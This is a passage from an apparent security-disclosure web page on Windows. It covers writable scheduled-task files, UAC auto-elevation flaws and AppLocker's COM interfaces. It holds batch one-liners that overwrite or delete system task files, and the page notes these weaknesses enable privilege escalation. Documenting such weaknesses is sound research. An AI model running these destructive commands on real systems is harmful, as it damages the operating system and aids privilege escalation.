Join\Device-Sync C:\Windows\System32\Tasks\Microsoft\Windows\Workplace Join\Recovery-Check C:\Windows\System32\Tasks\Microsoft\Windows\Workplace Join\Recovery-Check C:\Windows\System32\Tasks\Microsoft\Windows\WwanSvc\NotificationTask C:\Windows\System32\Tasks\Microsoft\Windows\WwanSvc\OobeDiscovery C:\Windows\System32\Tasks\Microsoft\Windows\WwanSvc\OobeDiscovery C:\Windows\System32\Tasks\Microsoft\Windows\WwanSvc\OobeDiscovery C:\Windows\System32\Tasks\Microsoft\XblGameSave\XblGameSaveTask
(Optional) Overwrite the task files which your
unprivileged user account can clobber and display
their access permissions
DACLs
in
SDDL
notation:
FOR /F "Delims=," %? IN ('SCHTASKS.EXE /QUERY /FO CSV ^| FIND.EXE "\"') DO @(1>NUL: 2>NUL: COPY /Y NUL: "%SystemRoot%\System32\Tasks%~?" && CACLS.EXE "%SystemRoot%\System32\Tasks%~?" /S)
C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\MareBackup "D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FA;;;BU)(A;;0x1200a9;;;LS)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)" C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask-Roam "D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;0x12019f;;;IU)" C:\Windows\System32\Tasks\Microsoft\Windows\CertificateServicesClient\UserTask-Roam "D:P(A;;FA;;;BA)(A;;FA;;;SY)(A;;0x12019f;;;IU)" C:\Windows\System32\Tasks\Microsoft\Windows\File Classification Infrastructure\Property Definition Sync "D:(D;;SD;;;AU)(A;;0x1201bf;;;AU)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)" C:\Windows\System32\Tasks\Microsoft\Windows\Input\InputSettingsRestoreDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)" C:\Windows\System32\Tasks\Microsoft\Windows\Input\LocalUserSyncDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)" C:\Windows\System32\Tasks\Microsoft\Windows\Input\MouseSyncDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)" C:\Windows\System32\Tasks\Microsoft\Windows\Input\PenSyncDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)" C:\Windows\System32\Tasks\Microsoft\Windows\Input\RemoteMouseSyncDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)" C:\Windows\System32\Tasks\Microsoft\Windows\Input\RemotePenSyncDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)" C:\Windows\System32\Tasks\Microsoft\Windows\Input\RemoteTouchpadSyncDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)" C:\Windows\System32\Tasks\Microsoft\Windows\Input\syncpensettings "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)" C:\Windows\System32\Tasks\Microsoft\Windows\Input\TouchpadSyncDataAvailable "D:(A;;FA;;;AU)(A;;FA;;;BA)(A;;FA;;;SY)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)" C:\Windows\System32\Tasks\Microsoft\Windows\Printing\PrinterCleanupTask "D:P(A;;FA;;;AU)(A;;FA;;;SY)" C:\Windows\System32\Tasks\Microsoft\Windows\Printing\PrintJobCleanupTask "D:P(A;;FA;;;AU)(A;;FA;;;SY)" C:\Windows\System32\Tasks\Microsoft\Windows\WindowsColorSystem\Calibration Loader "D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;0x12019f;;;BU)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)" C:\Windows\System32\Tasks\Microsoft\Windows\WindowsColorSystem\Calibration Loader "D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;0x12019f;;;BU)(A;ID;0x1f019f;;;BA)(A;ID;0x1f019f;;;SY)(A;ID;FR;;;AU)(A;ID;FR;;;LS)(A;ID;FR;;;NS)(A;ID;FA;;;BA)"OUCH²: on this (typical) installation of Windows 11 25H2 unprivileged users can overwrite 15 task files shipped with the system – a malicious actor modifies these task files instead to escalate its privileges!
(Optional) Remove the task files which your (or any other) unprivileged user account can remove:
FOR /F "Delims=," %? IN ('SCHTASKS.EXE /QUERY /FO CSV ^| FIND.EXE "\"') DO @(1>NUL: 2>NUL: ERASE /F "%SystemRoot%\System32\Tasks%~?" && ECHO %SystemRoot%\System32\Tasks%~?)
C:\Windows\System32\Tasks\Microsoft\Windows\Application Experience\MareBackup C:\Windows\System32\Tasks\Microsoft\Windows\Input\InputSettingsRestoreDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\Input\LocalUserSyncDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\Input\MouseSyncDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\Input\PenSyncDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\Input\RemoteMouseSyncDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\Input\RemotePenSyncDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\Input\RemoteTouchpadSyncDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\Input\syncpensettings C:\Windows\System32\Tasks\Microsoft\Windows\Input\TouchpadSyncDataAvailable C:\Windows\System32\Tasks\Microsoft\Windows\Printing\PrinterCleanupTask C:\Windows\System32\Tasks\Microsoft\Windows\Printing\PrintJobCleanupTaskOUCH³: on this (typical) installation of Windows 11 25H2 unprivileged users can delete 12 tasks files shipped with the system!
(Optional) Remove the subdirectories Microsoft with all
their task files:
RMDIR /Q /S "%SystemRoot%\System32\Tasks\Microsoft" RMDIR /Q /S "%SystemRoot%\SysWoW64\Tasks\Microsoft"
OUCH⁴: on all versions of Windows NT unprivileged users can delete all task files shipped with the system!
User Account Protection was the preliminary name for a core security component of Windows Vista. The component has now been officially named User Account Control (UAC).How to disable User Account Control (UAC) on Windows Server
![[Screen shot of default 'User Account Control Settings' from Windows 7]](https://support.microsoft.com/library/images/2692682.png "Screen shot of default 'User Account Control Settings' from Windows 7")
![[Screen shot of default 'User Account Control Settings' from Windows 7]](https://docs.microsoft.com/en-us/windows/win32/uxguide/images/winenv-uac-image3.png "Screen shot of default 'User Account Control Settings' from Windows 7")
With Windows Vista Microsoft introduced
the security feature(really: security theatre) User Account Control – programs which need or want to be run with administrative privileges and access rights have to ask the user for consent.
This made some (really: a minority of) users quite angry –
although these (rather braindead) users continued to
abuse the (privileged)
Protected Administrator
account created during
Windows setup for their daily work (instead to
follow best practise
and use an unprivileged limited
alias standard
user account), they had to answer a prompt
whenever they wanted to perform an administrative task.
Unfortunately Microsoft heard these users and weakened
the security feature
(really:
security nightmare) – Windows 7
introduced auto-elevation
and enabled it for some 55 programs
shipped with Windows 7 and later versions which
don’t prompt for consent any more.
Due to flaws in the design and deficiencies in the implementation of
User Account Control it can be bypassed trivially in
numerous ways with its auto-elevation
(mis)feature enabled.
As result, arbitrary programs can then be run with administrative
privileges and access rights without prompting the user for consent.
To defeat some of these trivial bypasses, auto-elevation
must
be disabled by moving the slider of the
User Account Control setting to its highest position
titled Always notify
, as documented and shown in the
MSKB
articles
975787
and
4462938.
Caveat: the slider position displayed in the
graphical user interface but does not always match
the effective setting – it shows Always notify
even if
the default setting
Notify me only when programs try to make changes to my computer
is configured!
![[Screen shot of 'Group Policy Object Editor' from Windows 7]](download/WHISPER1.PNG "Screen shot of 'Group Policy Object Editor' from Windows 7")
On a default installation of Windows 7 or later
versions of Windows NT perform the following 9 simple
steps.
Logon to the user
Protected Administrator account created
during Windows setup.
Start one of the programs which have auto-elevation
enabled,
for example
NetPlWiz.exe,
PrintUI.exe or
WUSA.exe
– they start without to prompt for consent.
Open Control Panel, then User Accounts and
click Change User Account Control setting
, then move the
slider to its highest position titled Always notify
and click
the button to apply the new setting.
Run the command line
"%SystemRoot%\System32\MMC.exe" "%SystemRoot%\System32\GPEdit.msc"
to start the
Local Group Policy Editor snap-in of
the Microsoft Management Console, or
execute the command line
"%SystemRoot%\System32\MMC.exe" "%SystemRoot%\System32\SecPol.msc"
to start the Local Security Policy
snap-in, answer the prompt for consent, then open the
Local Policies
folder and the Security Options
subfolder below it – the policy
User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode
is displayed as Prompt for consent on the secure desktop
,
properly matching the setting applied in step 3.
Repeat step 2. – auto-elevating programs prompt for consent now.
Start the Registry Editor
RegEdit.exe, answer the prompt
for consent, then open the registry key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
and delete the DWORD registry entry
ConsentPromptBehaviorAdmin present there.
Repeat step 4. – the policy
User Account Control: Behavior of the elevation prompt for administrators in Admin Approval Mode
is now properly displayed as Not Defined
.
Open Control Panel, then User Accounts
and click Change User Account Control setting
– the
slider is still displayed in its highest position
Always notify
.
Repeat step 2. – despite the unchanged
slider position Always notify
auto-elevating programs
don’t prompt for consent any more!
setting, but abuses a registry entry reserved for a
policyinstead, it misinterprets the default policy value
Not Definedand violates the almost 30 (in words: thirty) year old Designed for Windows guidelines!
[HKEY_CURRENT_USER\Software\‹company›\‹application›]
"‹setting›"=‹value›[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\‹application›]
"‹setting›"=‹value›[HKEY_CURRENT_USER\Software\Policies\‹company›\‹application›]
"‹policy›"=‹value›[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\‹application›]
"‹policy›"=‹value›[HKEY_LOCAL_MACHINE\SOFTWARE\‹company›\‹application›]
"‹setting›"=‹value›[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\‹application›]
"‹setting›"=‹value›[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\‹company›\‹application›]
"‹policy›"=‹value›[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\‹application›]
"‹policy›"=‹value›Get-AppLockerFileInformation,
Get-AppLockerPolicy,
New-AppLockerPolicy,
Set-AppLockerPolicy
and
Test-AppLockerPolicy.
PowerShell.exe /Command "Import-Module AppLocker; Get-AppLockerFileInformation -Directory '%WINDIR%'" PowerShell.exe /Command "Import-Module AppLocker; Get-AppLockerFileInformation -Path '%COMSPEC%'" PowerShell.exe /Command "Import-Module AppLocker; Get-AppLockerPolicy -Effective | Test-AppLockerPolicy -Path '%COMSPEC%'"
Path Publisher Hash ---- --------- ---- %WINDIR%\BFSVC.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS® OPERATING SYSTEM\BFSVC.EXE,6.1.7601.17514 SHA256 0x6BF48AC00680DA7969B51835B2C823755DCE121834082CDDAE24B4AAE267A92C %WINDIR%\EXPLORER.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS® OPERATING SYSTEM\EXPLORER.EXE,6.1.7601.23537 SHA256 0xA186E53413C0A22B6BEE8A8D1BBF09550F1BEC2BF933D5DA3EFE7D42691C9EFD %WINDIR%\FVEUPDATE.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS® OPERATING SYSTEM\FVEUPDATE.EXE,6.1.7601.23403 SHA256 0x89CF83AB9D92E3B074EC3A64D091262E4537158C2BDFD47EC16A56863AEA273D %WINDIR%\HELPPANE.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS® OPERATING SYSTEM\HELPPANE.EXE,6.1.7601.23834 SHA256 0x9C1C90258267F795B092DBE74EDE34AC96FEF6C64892E0E9425E7D13193586FA %WINDIR%\HH.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\HTML HELP\HH.EXE,6.1.7601.24134 SHA256 0x5B6F92A818791679C71EB1249F684285E807CE45FA045162EA7BBF846D7FF167 %WINDIR%\NOTEPAD.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS® OPERATING SYSTEM\NOTEPAD.EXE,6.1.7601.23403 SHA256 0x4FD49DEF42CCF59968520F1A4DD9F136E7D6E3D6CEBC3C1DAC627CC0C8A34152 %WINDIR%\REGEDIT.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS® OPERATING SYSTEM\REGEDIT.EXE,6.1.7600.16385 SHA256 0x053A6D9C29A8A9C4DB3600CA46F8D4C32ABFFC090C87726DA5CA2EC8E068EAD1 %WINDIR%\SPLWOW64.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS® OPERATING SYSTEM\SPLWOW64.EXE,6.1.7601.23403 SHA256 0xEC19AE82CFF53F3EC05D231F115DA50BEA81753A2B2E335DEBF41E4560FFEAD5 %WINDIR%\TWUNK_16.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\\,0.0.0.0 SHA256 0x103035A32E7893D702CED974FAA4434828BC03B0CC54D1B2E1205A2F2575E7C9 %WINDIR%\TWUNK_32.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\TWAIN THUNKER\TWUNK_32.EXE,1.7.1.0 SHA256 0x5E0831E4568A673CB23B955D30132D58669F6BF5FDBBA52693C0AEB9C72B5881 %WINDIR%\WINHLP32.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS® OPERATING SYSTEM\WINHLP32.EXE,50.1.7600.16386 SHA256 0x0C2FD81A6ADBF6B48B18555B1D29192EE3DAB61631EA447714DFCF7FF0F321F1 %WINDIR%\WRITE.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS® OPERATING SYSTEM\WRITE,6.1.7600.16385 SHA256 0xD1635E8EEE2979A4FBA988CAE2BA8FFB700FC78109FC1C38DCE8B4AC9E8FF402 %WINDIR%\TWAIN.DLL O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\\,0.0.0.0 SHA256 0x3D922F8B608401AF4F34F71DBACFA458CEF1F7BFFFEDD7FEBEE0A968E51D6DCE %WINDIR%\TWAIN_32.DLL O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\TWAIN_32 SOURCE MANAGER\TWAIN_32.DLL,1.7.1.3 SHA256 0x7E2FADCA8D0C5A279B2CD058D6C44D0FF2945286FFF7B0EADFF7D9D61314BE29 Path Publisher Hash ---- --------- ---- %SYSTEM32%\CMD.EXE O=MICROSOFT CORPORATION, L=REDMOND, S=WASHINGTON, C=US\MICROSOFT® WINDOWS® OPERATING SYSTEM\CMD.EXE,6.1.7601.23403 SHA256 0x7B78775AEC2C6D6C74CB7D431097A4018A9C6016E1B02CB0C7B2DD5C00B45267 FilePath PolicyDecision MatchingRule -------- -------------- ------------ C:\Windows\system32\cmd.exe AllowedByDefaultTheir implementation uses methods from the (undocumented) COM interface
IAppIdPolicyHandler of the scriptable
COM class
AppIdPolicyHandler and from the (undocumented)
COM interface
IAppIdPolicyHelper of the scriptable
COM class
AppIdPolicyHelper, both provided by
%SystemRoot%\System32\AppIdPolicyEngineApi.dll
via IID
{B6FEA19E-32DD-4367-B5B7-2F5DA140E87D},
CLSID
{F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3} and
ProgID
AppIdPolicyEngineApi.AppIdPolicyHandler respectively
IID
{D500522D-465B-4C83-8008-00C4EC90A859},
CLSID
{0AEA3667-1039-43FF-8D21-B1A162090671} and
ProgID
AppIdPolicyEngineApi.AppIdPolicyHelper:
REG.EXE QUERY HKCR\Interface\{B6FEA19E-32DD-4367-B5B7-2F5DA140E87D} /S
REG.EXE QUERY HKCR\CLSID\{F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3} /S
REG.EXE QUERY HKCR\AppIdPolicyEngineApi.AppIdPolicyHandler /S
REG.EXE QUERY HKCR\AppIdPolicyEngineApi.AppIdPolicyHandler.1 /S
REG.EXE QUERY HKCR\Interface\{D500522D-465B-4C83-8008-00C4EC90A859} /S
REG.EXE QUERY HKCR\CLSID\{0AEA3667-1039-43FF-8D21-B1A162090671} /S
REG.EXE QUERY HKCR\AppIdPolicyEngineApi.AppIdPolicyHelper /S
REG.EXE QUERY HKCR\AppIdPolicyEngineApi.AppIdPolicyHelper.1 /S
HKEY_CLASSES_ROOT\Interface\{B6FEA19E-32DD-4367-B5B7-2F5DA140E87D}
(Default) REG_SZ IAppIdPolicyHandler
HKEY_CLASSES_ROOT\Interface\{B6FEA19E-32DD-4367-B5B7-2F5DA140E87D}\ProxyStubClsid
(Default) REG_SZ {00020424-0000-0000-C000-000000000046}
HKEY_CLASSES_ROOT\Interface\{B6FEA19E-32DD-4367-B5B7-2F5DA140E87D}\ProxyStubClsid32
(Default) REG_SZ {00020424-0000-0000-C000-000000000046}
HKEY_CLASSES_ROOT\Interface\{B6FEA19E-32DD-4367-B5B7-2F5DA140E87D}\TypeLib
(Default) REG_SZ {85C3F8F7-CFCE-4259-87FF-CAB1F4521F6E}
Version REG_SZ 1.0
HKEY_CLASSES_ROOT\CLSID\{F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3}
(Default) REG_SZ AppIdPolicyHandler Class
HKEY_CLASSES_ROOT\CLSID\{F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3}\InprocServer32
(Default) REG_SZ C:\Windows\System32\AppIdPolicyEngineApi.dll
ThreadingModel REG_SZ Apartment
HKEY_CLASSES_ROOT\CLSID\{F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3}\ProgID
(Default) REG_SZ AppIdPolicyEngineApi.AppIdPolicyHandler.1
HKEY_CLASSES_ROOT\CLSID\{F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3}\Programmable
HKEY_CLASSES_ROOT\CLSID\{F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3}\TypeLib
(Default) REG_SZ {85C3F8F7-CFCE-4259-87FF-CAB1F4521F6E}
HKEY_CLASSES_ROOT\CLSID\{F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3}\Version
(Default) REG_SZ 1.0
HKEY_CLASSES_ROOT\CLSID\{F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3}\VersionIndependentProgID
(Default) REG_SZ AppIdPolicyEngineApi.AppIdPolicyHandler
ERROR: The specified registry key or value was not found.
ERROR: The specified registry key or value was not found.
HKEY_CLASSES_ROOT\Interface\{D500522D-465B-4C83-8008-00C4EC90A859}
(Default) REG_SZ IAppIdPolicyHelper
HKEY_CLASSES_ROOT\Interface\{D500522D-465B-4C83-8008-00C4EC90A859}\ProxyStubClsid
(Default) REG_SZ {00020424-0000-0000-C000-000000000046}
HKEY_CLASSES_ROOT\Interface\{D500522D-465B-4C83-8008-00C4EC90A859}\ProxyStubClsid32
(Default) REG_SZ {00020424-0000-0000-C000-000000000046}
HKEY_CLASSES_ROOT\Interface\{D500522D-465B-4C83-8008-00C4EC90A859}\TypeLib
(Default) REG_SZ {85C3F8F7-CFCE-4259-87FF-CAB1F4521F6E}
Version REG_SZ 1.0
HKEY_CLASSES_ROOT\CLSID\{0AEA3667-1039-43FF-8D21-B1A162090671}
(Default) REG_SZ AppIdPolicyHelper Class
HKEY_CLASSES_ROOT\CLSID\{0AEA3667-1039-43FF-8D21-B1A162090671}\InprocServer32
(Default) REG_SZ C:\Windows\System32\AppIdPolicyEngineApi.dll
ThreadingModel REG_SZ Apartment
HKEY_CLASSES_ROOT\CLSID\{0AEA3667-1039-43FF-8D21-B1A162090671}\ProgID
(Default) REG_SZ AppIdPolicyEngineApi.AppIdPolicyHelper.1
HKEY_CLASSES_ROOT\CLSID\{0AEA3667-1039-43FF-8D21-B1A162090671}\Programmable
HKEY_CLASSES_ROOT\CLSID\{0AEA3667-1039-43FF-8D21-B1A162090671}\TypeLib
(Default) REG_SZ {85C3F8F7-CFCE-4259-87FF-CAB1F4521F6E}
HKEY_CLASSES_ROOT\CLSID\{0AEA3667-1039-43FF-8D21-B1A162090671}\Version
(Default) REG_SZ 1.0
HKEY_CLASSES_ROOT\CLSID\{0AEA3667-1039-43FF-8D21-B1A162090671}\VersionIndependentProgID
(Default) REG_SZ AppIdPolicyEngineApi.AppIdPolicyHelper
ERROR: The specified registry key or value was not found.
ERROR: The specified registry key or value was not found.
OOPS: the version-independent as well as the
versioned
ProgIDs
are but not registered!
AppIdPolicyHandler and AppIdPolicyHelper
with
Windows Script Host.
Execute the OLE/COM Object Viewer
application OLEView.exe
shipped with the
Windows SDK
to generate the interface description:
OLEVIEW.EXE "%SystemRoot%\System32\AppIdPolicyEngineApi.dll"
// Generated .IDL file (by the OLE/COM Object Viewer)
//
// typelib filename: AppIdPolicyEngineApi.dll
[
uuid(85C3F8F7-CFCE-4259-87FF-CAB1F4521F6E),
version(1.0),
helpstring("AppIdPolicyEngineApi 1.0 Type Library")
]
library AppIdPolicyEngineApiLib
{
// TLib : // TLib : OLE Automation : {00020430-0000-0000-C000-000000000046}
importlib("stdole2.tlb");
// Forward declare all types defined in this typelib
interface IAppIdPolicyHandler;
interface IAppIdMmcPolicyHandler;
interface IAppIdPolicyHelper;
[
uuid(F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3),
helpstring("AppIdPolicyHandler Class")
]
coclass AppIdPolicyHandler {
[default] interface IAppIdPolicyHandler;
};
[
odl,
uuid(B6FEA19E-32DD-4367-B5B7-2F5DA140E87D),
helpstring("IAppIdPolicyHandler Interface"),
dual,
nonextensible,
oleautomation
]
interface IAppIdPolicyHandler : IDispatch {
[id(0x00000001), helpstring("method SetPolicy")]
HRESULT SetPolicy(
[in] BSTR bstrLdapPath,
[in] BSTR bstrXmlPolicy);
[id(0x00000002), helpstring("method GetPolicy")]
HRESULT GetPolicy(
[in] BSTR bstrLdapPath,
[out, retval] BSTR* pbstrXmlPolicy);
[id(0x00000003), helpstring("method GetEffectivePolicy")]
HRESULT GetEffectivePolicy([out, retval] BSTR* pbstrXmlPolicy);
[id(0x00000004), helpstring("method IsFileAllowed")]
HRESULT IsFileAllowed(
[in] BSTR bstrXmlPolicy,
[in] BSTR bstrFilePath,
[in] BSTR bstrUserSid,
[out] GUID* pguidResponsibleRuleId,
[out, retval] long* pbStatus);
};
[
uuid(5971EC44-072A-41B7-8E67-D9E045CC196D),
helpstring("AppIdMmcPolicyHandler Class")
]
coclass AppIdMmcPolicyHandler {
[default] interface IAppIdMmcPolicyHandler;
};
[
odl,
uuid(B780009A-2622-46E4-A23C-33E8D0990B27),
helpstring("IAppIdMmcPolicyHandler Interface"),
dual,
nonextensible,
oleautomation
]
interface IAppIdMmcPolicyHandler : IDispatch {
[id(0x00000001), helpstring("method Register")]
HRESULT Register(
[in] IUnknown* pGPEInformation,
[out, retval] GUID* pguidClientId);
[id(0x00000002), helpstring("method Unregister")]
HRESULT Unregister([in] GUID guidClientId);
[id(0x00000003), helpstring("method SetPolicy")]
HRESULT SetPolicy(
[in] GUID guidClientId,
[in] BSTR bstrXmlPolicy);
[id(0x00000004), helpstring("method GetPolicy")]
HRESULT GetPolicy(
[in] GUID guidClientId,
[out, retval] BSTR* pbstrXmlPolicy);
};
[
uuid(0AEA3667-1039-43FF-8D21-B1A162090671),
helpstring("AppIdPolicyHelper Class")
]
coclass AppIdPolicyHelper {
[default] interface IAppIdPolicyHelper;
};
[
odl,
uuid(D500522D-465B-4C83-8008-00C4EC90A859),
helpstring("IAppIdPolicyHelper Interface"),
dual,
nonextensible,
oleautomation
]
interface IAppIdPolicyHelper : IDispatch {
[id(0x00000001), helpstring("method GetFileType")]
HRESULT GetFileType(
[in] BSTR bstrFilePath,
[out, retval] FILE_TYPE* peFileType);
[id(0x00000002), helpstring("method GetFileRuleCollection")]
HRESULT GetFileRuleCollection(
[in] FILE_TYPE eFileType,
[out, retval] BSTR* pbstrRuleCollection);
[id(0x00000003), helpstring("method GetFileExtensions")]
HRESULT GetFileExtensions(
[in] FILE_TYPE eFileType,
[out, retval] BSTR* pbstrFileExtesnions);
[id(0x00000004), helpstring("method CalculateFileHash")]
HRESULT CalculateFileHash(
[in] BSTR bstrFilePath,
[out, retval] SAFEARRAY(unsigned char)* ppsabHashData);
[id(0x00000005), helpstring("method CalculateFilePublisher")]
HRESULT CalculateFilePublisher(
[in] BSTR bstrFilePath,
[out] BSTR* pbstrPublisherName,
[out] BSTR* pbstrProductName,
[out] BSTR* pbstrBinaryName,
[out] uint64* pulBinaryVersion);
[id(0x00000006), helpstring("method NormalizeFilePath")]
HRESULT NormalizeFilePath(
[in] BSTR bstrFilePath,
[out, retval] BSTR* pbstrNormalizedFilePath);
[id(0x00000007), helpstring("method EncodeFilePublisherInformation")]
HRESULT EncodeFilePublisherInformation(
[in] BSTR bstrInformation,
[in] long bIngoreWildCharacters,
[out, retval] BSTR* pbstrEncodedInformation);
[id(0x00000008), helpstring("method DecodeFilePublisherInformation")]
HRESULT DecodeFilePublisherInformation(
[in] BSTR bstrInformation,
[out, retval] BSTR* pbstrDecodedInformation);
[id(0x00000009), helpstring("method CompileRule")]
HRESULT CompileRule(
[in] BSTR bstrXmlRule,
[out, retval] BSTR* pbstrCompiledRule);
};
typedef [helpstring("FileType")public]
__MIDL___MIDL_itf_appidpolicyengineapi_0000_0000_0001 FILE_TYPE;
typedef [helpstring("FileType")]
enum {
FILE_TYPE_NOT_SUPPORTED = 0,
FILE_TYPE_EXE = 1,
FILE_TYPE_DLL = 2,
FILE_TYPE_WINDOWS_INSTALLER = 3,
FILE_TYPE_SCRIPT = 4
} __MIDL___MIDL_itf_appidpolicyengineapi_0000_0000_0001;
}; Create the text file whisper.wsf with the following
content in an arbitrary, preferable empty directory:
<?xml version='1.0' encoding='US-ASCII' standalone='yes' ?>
<package>
<comment>Copyright (C) 2009-2026, Stefan Kanthak</comment>
<job id='Handler'>
<object id='AppIdPolicyHandler' classid='clsid:F1ED7D4C-F863-4DE6-A1CA-7253EFDEE1F3' />
<script language='JScript'>
<![CDATA[
WScript.Echo(AppIdPolicyHandler.GetEffectivePolicy())
WScript.Echo(AppIdPolicyHandler.GetPolicy(""))
// WScript.Echo(AppIdPolicyHandler.SetPolicy("", "<AppLockerPolicy Version='1' />"))
WScript.Quit(0)
]]>
</script>
</job>
<job id='Helper'>
<object id='AppIdPolicyHelper' classid='clsid:0AEA3667-1039-43FF-8D21-B1A162090671' />
<reference guid='85C3F8F7-CFCE-4259-87FF-CAB1F4521F6E' />
<script language='VBScript'>
<![CDATA[
Option Explicit
With AppIdPolicyHelper
WScript.Echo .GetFileType(WScript.ScriptName) & vbTab & WScript.ScriptName
WScript.Echo .GetFileType(WScript.FullName) & vbTab & WScript.FullName
WScript.Echo .GetFileType(WScript.Path) & vbTab & WScript.Path
WScript.Echo
WScript.Echo .GetFileRuleCollection(FILE_TYPE_EXE) & vbTab & .GetFileExtensions(FILE_TYPE_EXE)
WScript.Echo .GetFileRuleCollection(FILE_TYPE_DLL) & vbTab & .GetFileExtensions(FILE_TYPE_DLL)
WScript.Echo .GetFileRuleCollection(FILE_TYPE_WINDOWS_INSTALLER) & vbTab & .GetFileExtensions(FILE_TYPE_WINDOWS_INSTALLER)
WScript.Echo .GetFileRuleCollection(FILE_TYPE_SCRIPT) & vbTab & .GetFileExtensions(FILE_TYPE_SCRIPT)
WScript.Echo
WScript.Echo WScript.ScriptName & " = " & .NormalizeFilePath(WScript.ScriptName)
WScript.Echo WScript.FullName & " = " & .NormalizeFilePath(WScript.FullName)
WScript.Echo
